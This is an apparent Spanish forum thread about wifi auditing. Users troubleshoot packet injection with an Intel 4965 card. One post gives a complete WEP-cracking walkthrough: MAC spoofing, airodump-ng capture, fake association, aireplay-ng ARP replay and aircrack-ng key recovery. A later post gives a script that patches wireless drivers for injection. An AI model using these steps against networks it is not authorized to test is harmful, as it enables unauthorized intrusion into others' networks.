P.D. ojo que hace tiempo que no me pongo mucho con comandos de sistema y menos con ubuntu e igual te haces una canterita en ese pen de 8 Gb  ;D

P.D. 2 si he dicho una burrada (espero que no) , me lo corrijan

saludos

buenas, yo siempre cuando abro terminal,en el abro cuatro pestañas y lo 1º que ejecuto en todas ellas es sudo -i y mi contraseña; despues los comandos necesarios.
probare con los comandos que me dices a ver si tengo suerte y los puedo borrar; ya informare de los resultados

gracias y saludos
Título: Re: Inyectar con 4965
Publicado por: raspa1989 en 14-03-2010, 22:22 (Domingo)
Nose porque tienes que teclear ifconfig down wlan0, no lo entiendo :S, cuando inicio ubuntu esta ya levantada la tarjeta  y no tengo que detenerla para nada, que raro.
Título: Re: Inyectar con 4965
Publicado por: trini en 15-03-2010, 13:57 (Lunes)
Nose porque tienes que teclear ifconfig down wlan0, no lo entiendo :S, cuando inicio ubuntu esta ya levantada la tarjeta  y no tengo que detenerla para nada, que raro.
como no la detenga, no se asocia, lo he probado almenos diez veces.

el por que, no lo se.
Título: Re: Inyectar con 4965
Publicado por: darherm79 en 09-04-2010, 19:56 (Viernes)
Hola a todos,

Este es mi primer post, y he de decir que soy un principiante en esto de las auditorías. Así que espero no meter mucho la pata.

He seguido los pasos del tutorial y todo perfecto, consigo asociar e inyectar. Mi problema es que cuando ejecuto aircrack-ng dario.cap me dice que el archivo no existe.

No lo entiendo, porque se supone que cuando lanzas airodump-ng -w dario -bssid XX:XX... -c X mon0     te crea el archivo.

Agradecería mucho vuestra ayuda.

Os felicito por el trabajo que haceis.

Post Merge: 09-04-2010, 20:57 (Viernes)
Key found!!!!!!!

He cambiado aircrack-ng dario.cap por aricrack-ng *.cap y .....  conseguido.

Muchas gracias por todo, haceis un trabajo formidable.
Título: Re: Inyectar con 4965
Publicado por: carretero_3 en 13-06-2010, 05:49 (Domingo)
Buenas, queria comentaros una curiosidad que me ha pasado hoy. Pues resulta que tengo 2 ordenadores completamente iguales. Cuando digo iguales es iguales, misma grafica, audio, placa, procesador, RAM, Wifi (Intel 4965AGN), sistema operativo, drivers... vamos identicos. Pues el caso es que instale el Wifiway 1.0 Final en un LiveUSB con el Unetbootin, arranca el Wifiway y empiezo manos a la obra y todo bien, clave ASCII descifrada en menos de 5 minutos. Pues me dio por probar lo mismo en el otro portatil y cual es mi sorpresa que todo funciona perfectamente hasta el envio de paquetes, ya que no envia nada, solo lee. He probado con mi conexion y otra y en un ordenador funciona todo perfecto y rapido y en el otro, siendo identico, no envia paquetes. Alguien sabe porque puede pasar esto? La pregunta es ya por curiosidad ya que mientras me funcione en uno tengo bastante pero es que me parecio raro y querria saber el motivo. Gracias.
Título: Re: Inyectar con 4965
Publicado por: ChimoC en 16-06-2010, 23:01 (Miércoles)
Buenas:

@ carretero: A veces funciona y otras veces no funciona.... no es ciencia exacta. Te pongo un ejemplo.

En mi casa tengo un router con el que cacharreo... pues a veces la alfa de 500 inyecta, otras veces no inyecta, otras se asocia, otras no.... ¿por que? Yo no tengo la más remota idea... (al igual de por que cambian de humor las mujeres  ^-^  )

Un saludo

ChimoC
Título: Re: Inyectar con 4965
Publicado por: caverdj en 19-07-2010, 18:42 (Lunes)
Pues a mi con el wifiway 1.0 final y la 4965 de intel y los comandos del principio de este hilo me funciona perfecto, con el único inconveniente de que una vez ejecutados todos los comandos en las diferentes consolas, para que empiecen a subir los ARP y los DATA me tengo que conectar al modem con otro equipo, ( en este caso me conecto con mi movil el iphone, metiendo la clave y conectandome al wifi ). A alguien le pasa algo similar? He probado a dejarlo un dia entero y no sube ni 1 ARP, en cambio conectandome asi con otro equipo se me pone a 450 Data/segundo.
Título: Re: Inyectar con 4965
Publicado por: CARLOSPICO en 02-08-2010, 09:19 (Lunes)
Hola,
Me estoy volviendo loco con las pruebas con el router y mi 4965.
Tengo un problema ahora que no consigo superar.
Cuando intento asociar con el interfaz mon:

wpa_supplicant -c/home/ubuntu/Desktop/wpa.conf -Dwext -imon2

me sale lo siguiente:

SIOCSIFFLAGS: Operation not supported
l2_packet_receive - recvfrom: Network is down
ioctl[SIOCGIWSCAN]: Network is down
ioctl[SIOCSIWSCAN]: Network is down
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Network is down
ioctl[SIOCSIWSCAN]: Network is down
Failed to initiate AP scan.

Y si lo vuelvo a intentar la interfaz se pone en modo managed y sale:

SIOCSIFFLAGS: Operation not supported
Could not set interface 'mon2' UP
Failed to initialize driver interface

Y no consigo seguir adelante, alguna idea plis.

UN SALUDO


Post Merge: 04-08-2010, 08:41 (Miércoles)
Hola de nuevo.
Imposible asociar con el wpa_supplicant, me sale el error:

WPS-AP-AVAILABLE
Trying to associate with 00:18:9b:a1:6f:e4 (SSID='R-wlan8' freq=2447 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Authentication with 00:18:9b:a1:6f:e4 timed out.

Alguna idea.

Título: Re: Inyectar con 4965
Publicado por: zona86 en 15-08-2010, 17:23 (Domingo)
Hola, he estado mirando tutoriales y tal, pero no lo he encontrado...
 solo queria saber si es posible averiguar la contraseña de las redes que tienen 54, 54e y 54e. en la columna MB al hacer airodump-ng wlan0?
  
Muchas Gracias
Saludos
Título: Re: Inyectar con 4965
Publicado por: trini en 02-09-2011, 00:55 (Viernes)
Bueno, tiempo que intento y aun no puedo salir de este problema, el wpa_supplicant.
Este es mi wpa_conf
Código: [Seleccionar]
network={
        ssid="zbdstudio"
        key_mgmt=NONE
        bssid=00:02:CF:BF:30:FC
        wep_key0="232323343478787"
}

Sin embargo se queda en el bucle siguiente
Código: [Seleccionar]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:02:cf:bf:30:fc (SSID='zbdstudio' freq=2437 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Association request to the driver failed
Associated with 00:00:00:00:00:00
CTRL-EVENT-CONNECTED - Connection to 00:00:00:00:00:00 completed (reauth) [id=0 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
CTRL-EVENT-SCAN-RESULTS
^CCTRL-EVENT-TERMINATING - signal 2 received

Ya lo he dejado como dos horas y no llega a conectar.

He realizado los primeros pasos, como todos los tutoriales, a lo que tengo duda y que creo es como debo dejar mi wireless, si me desconecto de la red en la que estoy, o la dejo tal como esta.

A mi me pasa lo mismo :(, alguien sabe  porque ? :( uso ubuntu 9.10 nose si algo qe ver ..me reconoce la tarjeta y monitorea pero al asociarme me sale asi como el...

No sabe nadie porque es ese fallo de disconect event ?? :S

Post Merge: [time]lun 01 feb 2010 22:23:56 GMT-1[/time]
INYECCION 4965 AGN en Linux Ubuntu 9.10  claves WEP ( PROBADO 100% DEFINITIVO)


1.   iwlist wlan0 scan ( para  ver las redes sin iniciar airmon-ng ), debemos de fijarnos en los campos:
-  BSSID que es la mac de la red. aa:bb:cc:dd:ee     por ejemplo.
-   SSID que es el nombre de la red.
-   CHANNEL o C, lo apuntamos, es el canal que usa la red.
-   Si queremos usar macchanger para cambiar nuestra mac se hace asi :
Ifconfig  wlan0 down
Macchanger   -m  11:22:33:44:55  wlan 0 o poner los digitos que queramos.
Ifconfig   wlan0 up  (todos estos pasos con sudo delante si no somos root).
Yo este tutorial lo he hecho sin macchanger y me a funcionado.

2.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root.
-   airmon-ng   start   wlan0 9    ( el numero 9 es el canal de mi red seleccionada, vosotros teneis que poner el canal de vuestra red, que hemos mirado con el comando anterior).
-   Se nos creara una interfaz nueva virtual llamada mon0, que lo podemos mirar con el comando “iwconfig”.
-   Aquí viene lo que hice y me funciono, teclee 3 veces más “airmon-ng start wlan0 9” y me creo 3 interfaces nuevas, llamadas mon0, mon1, mon2 y mon3.
-   Se quedaría wlan0, mon0, mon1, mon2 y mon3. ¿ Por qué hago esto? Porque  la tarjeta 4965 agn solo inyecta, asocia y monitorea con interfaces “mon”. No utilizo wlan0 para nada, solo para iwlist wlan0 scan.

3.   airodump-ng     –w  redes    –bssid aa:bb:cc:dd:ee    -c  9 mon0
-
   Utilizaremos mon0 para escanear la red seleccionada, -c es el canal que hemos apuntado,  -w es el nombre de los archivos que nos guardara en la carpeta  /home/nuestro usuario/, es decir nuestra carpeta personal.
-   -bbsid es la dirección MAC de el Router de la red que hemos seleccionado.

4.   Creamos en el escritorio un archivo de texto llamado wpa.conf con la estructura siguiente, debemos guardarlo, hay gente que lo deja abierto, yo no:
Network={
      ssid=”Nombre de la red”  ( va con comillas)
      key_mgmt=NONE
      bssid= aa:bb:cc:dd:ee   ( por ejemplo)
      wep_key0=”1234567890” ( con comillas)
}

5.   Abrimos una terminal nueva, tecleamos “sudo su” ponemos la contraseña y seremos root, nos asociamos con:


-   wpa_supplicant   -c/home/nuestro usuario/Escritorio/wpa.conf   -Dwext   –imon2
-   usamos la interfaz mon2 para que se asocie, y nos debe de mostrar este mensaje entre otros tantos como:
 CRTL-EVENT-CONECTED – Conecction  aa:bb:cc:dd:ee    completed (reauth) [id=0 id_str=]
( Si os sale una cosa como “CRTL-EVENT-DISCONNECTED- disconnect remove keys “ es porque no habeis usado una interfaz mon). Podeis usar la mon1, pero a mi no me funciona aunque este creada, asique uso mon2.  El  -imon2 no es una errata debemos poner  -i “interfaz mon” como pone ahí.

6.   Abrimos otra ventana o solapa y tecleamos sudo su como antes:
-   Aireplay-ng   -3  -b  aa:bb:cc:dd:ee   -h 11:22:33:44:55 mon3
Os explico,   -b es la mac del ruter e decir la bssid,  -h es nuestra mac de nuestra tarjeta, y la interfaz mon3. Yo no he usado macchanger porque es mi red y no me hacia falta.  Si quereis usar macchanger, debeis hacerlo después de iwlist wlan0 scan.
-   Este punto es crucial, debemos esperar a que inyecte, puede variar el tiempo.
-   Es favorable que haya alguien dentro de la red.
-   Hay ruter que no soportan esta inyección.
-   Con wifiway 1.0 final no he sido capaz de inciar la tarjeta no me la reconoce, con wifiway 1.0 KXDE creo que es… si me la reconoce pero el airoscript no se asocia, se me queda en open system todo el rato y la ventana acaba desapareciendo.


7.   Debemos asegurarnos que estamos asociados en la ventana de airodump, en las columnas:
Bssid, station, PWR, rate, lost, paquets, probes, debajo de estas columnas debe aparecer nuestra conexión con nuestra MAC y la mac del ruter.

8.   Cuando consiga inyectar y los datas suban debemos tener 300 000 o asi mas o menos, depende de la clave, pueden ser mas o menos.
9.   Teclear en otra ventana sudo su, y el comando: aircrack-ng   *.cap  y nos sacara la clave :D
-   Si teneis dudas sobre el proceso postear, me alegro de haber solucionado mi problema, la interfaz wlan0 que aparece en todos los tutoriales a mi no me funciona.


he instalado ubuntu de nuevo, pero esta vez la versión 11.04, pero al poner el comando Aireplay-ng   -3  -b  aa:bb:cc:dd:ee   -h 11:22:33:44:55 mon3 me da error, me dice algo asi como que la interfac esta en -i y el canal del router es 6
¿alguien ha probado con esta versión de ubuntu?

saludos

P.D.: este es el error:
root@trini-S510-X-CP50B:~# aireplay-ng   -3  -b  00:xx:xx:xx:xx:xx   -h xx:xx:xx:xx:xx:xx mon3
01:15:14  Waiting for beacon frame (BSSID: 00:xx:xx:xx:xx:xx) on channel -1
01:15:14  mon3 is on channel -1, but the AP uses channel 6
root@trini-S510-X-CP50B:~#
Título: Re: Inyectar con 4965
Publicado por: alist3r en 02-09-2011, 02:32 (Viernes)
el kernel que viene en esa version de ubuntu no sirve para poner tu tarjeta en modo monitor.

es mas inteligente usar wifiway, que para eso se encarga el equipo de SeguridadWireless de ponerle esos parches de los que te hablo.

Ubuntu no es para hacer auditorias de redes wifi.
Título: Re: Inyectar con 4965
Publicado por: trini en 02-09-2011, 11:14 (Viernes)
el kernel que viene en esa version de ubuntu no sirve para poner tu tarjeta en modo monitor.

es mas inteligente usar wifiway, que para eso se encarga el equipo de SeguridadWireless de ponerle esos parches de los que te hablo.

Ubuntu no es para hacer auditorias de redes wifi.
almenos con wifiway antes no me iva, ni con backtrack, Wifislax, etc; por eso monte ubuntu la 1ª vez.

¿segun me dices, con mi antena no funciona con ubuntu 11.04?
¿ tendria que volver a poner ubuntu9.10?, con este era el unico que auditaba

espero su respuesta, gracias
Título: Re: Inyectar con 4965
Publicado por: alist3r en 02-09-2011, 11:34 (Viernes)
el kernel que viene en esa version de ubuntu no sirve para poner tu tarjeta en modo monitor.

es mas inteligente usar wifiway, que para eso se encarga el equipo de SeguridadWireless de ponerle esos parches de los que te hablo.

Ubuntu no es para hacer auditorias de redes wifi.
almenos con wifiway antes no me iva, ni con backtrack, Wifislax, etc; por eso monte ubuntu la 1ª vez.

¿segun me dices, con mi antena no funciona con ubuntu 11.04?
¿ tendria que volver a poner ubuntu9.10?, con este era el unico que auditaba

espero su respuesta, gracias

con tu adaptador (no digas antena, hombre :) )  podrás usar la nueva beta de wifiway 2.0.3 sin problemas, muy probablemente, ya que para eso se trata de una distro especializada en wireless.
y si no te fuera el adaptador nada mas empezar, solo tienes que preguntar en estos foros acerca de tu marca y modelo de adaptador, y te ayudarán a instalar el driver que te falte en wifiway.

usar ubuntu me parece un atraso. incluso backtrack, que está basada en ubuntu pero se le han incorporado los parches de inyección al kernel, su software de auditoria wireless deja mcuho que desear en comparacion con la version de airoscript que estamos manteniendo, corrigiendo y ampliando para wifiway
Título: Re: Inyectar con 4965
Publicado por: trini en 02-09-2011, 11:39 (Viernes)

ok, muchas gracias, probare con la version de wifiway que me dices y seguire tu consejo; perdon por lo de antena,jejejejej ;D
ubuntu tambien lo uso para recuperar algunos pendrive que windows no me deja; y me ha funcionado varias veces.

ya comentare resultados con wifiway,  saludos
Título: Re: Inyectar con 4965
Publicado por: trini en 04-09-2011, 19:02 (Domingo)
el kernel que viene en esa version de ubuntu no sirve para poner tu tarjeta en modo monitor.

es mas inteligente usar wifiway, que para eso se encarga el equipo de SeguridadWireless de ponerle esos parches de los que te hablo.

Ubuntu no es para hacer auditorias de redes wifi.
almenos con wifiway antes no me iva, ni con backtrack, Wifislax, etc; por eso monte ubuntu la 1ª vez.

¿segun me dices, con mi antena no funciona con ubuntu 11.04?
¿ tendria que volver a poner ubuntu9.10?, con este era el unico que auditaba

espero su respuesta, gracias

con tu adaptador (no digas antena, hombre :) )  podrás usar la nueva beta de wifiway 2.0.3 sin problemas, muy probablemente, ya que para eso se trata de una distro especializada en wireless.
y si no te fuera el adaptador nada mas empezar, solo tienes que preguntar en estos foros acerca de tu marca y modelo de adaptador, y te ayudarán a instalar el driver que te falte en wifiway.

usar ubuntu me parece un atraso. incluso backtrack, que está basada en ubuntu pero se le han incorporado los parches de inyección al kernel, su software de auditoria wireless deja mcuho que desear en comparacion con la version de airoscript que estamos manteniendo, corrigiendo y ampliando para wifiway
no me funciona bien, cuando ejecuto el comando aireplay se queda todo pillado, si inyecta pero no me deja hacer nada ni moverme a las otras ventanas, me obliga apagar el equipo de forma bruta.
todos los programas que te dije me daban problemas, por eso fue por lo que utilizaba ubuntu 9.10, y ahora la vers. 11.04 me da estos problemas
Título: Re: Inyectar con 4965
Publicado por: alist3r en 04-09-2011, 19:09 (Domingo)
el kernel que viene en esa version de ubuntu no sirve para poner tu tarjeta en modo monitor.

es mas inteligente usar wifiway, que para eso se encarga el equipo de SeguridadWireless de ponerle esos parches de los que te hablo.

Ubuntu no es para hacer auditorias de redes wifi.
almenos con wifiway antes no me iva, ni con backtrack, Wifislax, etc; por eso monte ubuntu la 1ª vez.

¿segun me dices, con mi antena no funciona con ubuntu 11.04?
¿ tendria que volver a poner ubuntu9.10?, con este era el unico que auditaba

espero su respuesta, gracias

con tu adaptador (no digas antena, hombre :) )  podrás usar la nueva beta de wifiway 2.0.3 sin problemas, muy probablemente, ya que para eso se trata de una distro especializada en wireless.
y si no te fuera el adaptador nada mas empezar, solo tienes que preguntar en estos foros acerca de tu marca y modelo de adaptador, y te ayudarán a instalar el driver que te falte en wifiway.

usar ubuntu me parece un atraso. incluso backtrack, que está basada en ubuntu pero se le han incorporado los parches de inyección al kernel, su software de auditoria wireless deja mcuho que desear en comparacion con la version de airoscript que estamos manteniendo, corrigiendo y ampliando para wifiway
no me funciona bien, cuando ejecuto el comando aireplay se queda todo pillado, si inyecta pero no me deja hacer nada ni moverme a las otras ventanas, me obliga apagar el equipo de forma bruta.
todos los programas que te dije me daban problemas, por eso fue por lo que utilizaba ubuntu 9.10, y ahora la vers. 11.04 me da estos problemas

ostias! ese tipo de situaciones, sin un hackercillo delante del teclado que sepa bastante del sistema SysRQ del kernel para intentar recuperar el control... va a ser super dificil diagnosticar nada eh... sorry...
Título: Re: Inyectar con 4965
Publicado por: trini en 06-09-2011, 00:14 (Martes)
ya lo solucione,  gracias por el interes prestado
Título: Re: Inyectar con 4965
Publicado por: alist3r en 06-09-2011, 00:18 (Martes)
ya lo solucione,  gracias por el interes prestado

no seas maleducao hombre!

cuando un usuario tenga el mismo problema que tu, y llegue a este hilo, y vea que tu lo resolviste pero no devolviste la ayuda que te prestaron otros tomandote almenos la molestia de explicar cómo lo has resuelto...

pos lógicamente esos usuarios se acordarán de toda tu familia  ^-^

ains...! que vamos a tener que hacer con vosotrosssss!!
Título: Re: Inyectar con 4965
Publicado por: trini en 06-09-2011, 21:33 (Martes)
ya lo solucione,  gracias por el interes prestado

no seas maleducao hombre!

cuando un usuario tenga el mismo problema que tu, y llegue a este hilo, y vea que tu lo resolviste pero no devolviste la ayuda que te prestaron otros tomandote almenos la molestia de explicar cómo lo has resuelto...

pos lógicamente esos usuarios se acordarán de toda tu familia  ^-^

ains...! que vamos a tener que hacer con vosotrosssss!!
que despiste tengo. tienes toda la razón, además  antes en la vers. 9.10  puse todos los pasos que daba , así que aquí va:
despues de leer un monton de post y de hacer almenos 10 o 12 pruebas, encontre las solución, pero aclaro que a otros las pruebas anterioes sí les funcionaba, esto devía de ser por la version del nucleo(no se)
a mi al hacer uname -r me aparecia esto 2.6.38-11-generic-pae, aqui esta el lio de por que otras pruebas no me funcionaba

asi que procedamos solo si le aparece lo mismo

copien esto y guardenlo en la carpeta personal con cualquier nombre pero con la extensión .sh (ejemplo trini.sh)

#!/bin/bash
sudo apt-get install -y linux-headers-$(uname -r) patch
wget http://www.orbit-lab.org/kernel/compat-wireless-2.6-stable/v2.6.38/compat-wireless-2.6.38.2-2.tar.bz2
tar -jxf compat-wireless-2.6.38.2-2.tar.bz2
cd compat-wireless-2.6.38.2-2/
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
make
sudo make install
sudo make unload
sudo reboot

depues le dais a boton derecho y a propiedades, vais a la pestaña permisos, y marcais en permitir ejecutar como una aplicación
abrimos un terminal y ejecutamos este comando

 chmod trini.sh(con el nombre que pongais al archivo)

yo abrí otro terminal para el siguiente comando

sh trini.sh(con el nombre que pongais al archivo)

nos pide la contraseña y después de un ratito (10-12 minutos), se reinicia y listo.

espero que le ayude  al que tenga el mismo problema

saludos
 
Título: Re: Inyectar con 4965
Publicado por: alist3r en 06-09-2011, 22:46 (Martes)
muy bien trini! eso es un post de un tio profesional, metodico y colaborador... asi me gusta! :D
Título: Re: Inyectar con 4965
Publicado por: trini en 07-09-2011, 00:37 (Miércoles)
muy bien trini! eso es un post de un tio profesional, metodico y colaborador... asi me gusta! :D
gracias por el aviso anterior >:( >:(
Título: Re: Inyectar con 4965
Publicado por: crepy en 22-11-2011, 18:54 (Martes)
Hola a todos! despues de varios dias leyendo manuales me decido a escribiros. Supongo que estareis cansados de que la gente pregunte sobre los pasos a dar, al igual que yo solo escribo por si alguien quiere echarme un cable. He seguido el manual de dexterback, tengo una intel 3945 con el wifiway 1.0, y me quedo atascado en la asociacion con el wpa_supplicant.

En una ventana de la konsole tengo la red con su bssid capturando beacons y datas.

Y en una segunda ventana tengo el comando:
Código: [Seleccionar]
wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0al presionar enter me sale algo como:
line 5: unknow network fiel "wepy_keyo".
line 6:failed to parse network block.
Failed to read or parse configuration "/root/swireless/wpa.conf".
Título: Re: Inyectar con 4965
Publicado por: alist3r en 22-11-2011, 19:57 (Martes)
mejor publica tu duda en la zona "live cd wifiway" que creo que es donde debe estar.